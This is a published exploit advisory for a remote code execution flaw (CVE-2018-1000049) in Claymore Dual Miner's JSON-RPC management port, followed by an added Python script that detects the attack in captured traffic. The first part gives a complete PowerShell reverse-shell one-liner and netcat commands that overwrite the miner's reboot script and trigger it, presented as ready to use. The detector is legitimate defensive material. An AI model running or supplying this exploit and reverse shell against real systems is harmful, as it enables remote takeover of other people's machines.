Nanopool Claymore Dual Miner 7.3 - Remote Code Execution
Source: vfocus.net  Author: ReverseBrain  Published: 2018-05-18
# Exploit Title: Nanopool Claymore Dual Miner >= 7.3 Remote Code Execution
# Date: 2018/02/09
# Exploit Author: ReverseBrain
# Vendor Homepage: https://nanopool.org/
# Software Link: https://github.com/nanopool/Claymore-Dual-Miner
# Version: 7.3 and later
# Tested on: Windows, Linux
# CVE : 2018-1000049
 
Suppose the miner is running on localhost on port 3333. First, convert the contents of a .bat file into hexadecimal format. For example, this one uses PowerShell to spawn a reverse shell that connects to a listener on localhost port 1234:
 
powershell.exe -Command "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
 
Convert it to hexadecimal and paste the result in place of HEX_STRING, the second parameter in this request:
 
echo '{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat","HEX_STRING"]}' | nc 127.0.0.1 3333 -v
 
Then, to trigger the vulnerability, just send the string {"id":0,"jsonrpc":"2.0","method":"miner_reboot"} to the miner:
 
echo '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}' | nc 127.0.0.1 3333 -v
 
You got the shell!
 
This exploit also works on Linux; just substitute reboot.bat with reboot.bash or reboot.sh.
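
For detection, the two-request sequence described above can be picked out of traffic captured on the miner's port. The following is an added example, not part of the original advisory: it scans newline-delimited JSON-RPC requests for a miner_file write to a reboot script followed by miner_reboot. The sample capture, the severity labels, the function name triage and the miner_getstat1 line (standing in for ordinary monitoring traffic) are assumptions made for illustration.

```python
import json

# File names the advisory says the miner_file request can overwrite.
REBOOT_SCRIPTS = {"reboot.bat", "reboot.sh", "reboot.bash"}

def triage(lines):
    """Return (line_no, severity, reason) for each suspicious JSON-RPC request."""
    findings, staged = [], False   # staged: a reboot script was overwritten earlier
    for n, raw in enumerate(lines, 1):
        try:
            req = json.loads(raw)
        except ValueError:
            continue               # not JSON, so not a management request
        if not isinstance(req, dict):
            continue
        method, params = req.get("method"), req.get("params")
        if method == "miner_file" and isinstance(params, list) and len(params) >= 2:
            name = str(params[0]).lower()
            try:
                size = len(bytes.fromhex(str(params[1])))  # report size only, not content
            except ValueError:
                size = None        # second parameter is not valid hex
            if name in REBOOT_SCRIPTS:
                staged = True
                findings.append((n, "high", f"miner_file overwrote {name} ({size} bytes)"))
            else:
                findings.append((n, "medium", f"miner_file wrote {name}"))
        elif method == "miner_reboot":
            if staged:
                findings.append((n, "critical", "miner_reboot after reboot script overwrite"))
            else:
                findings.append((n, "medium", "miner_reboot"))
    return findings

# Constructed capture (not real traffic); the hex string decodes to "echo test".
SAMPLE = [
    '{"id":0,"jsonrpc":"2.0","method":"miner_getstat1"}',
    '{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat","6563686f2074657374"]}',
    'not json',
    '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

A miner_reboot with no preceding overwrite is reported at lower severity, since on its own it does not show that a reboot script was replaced.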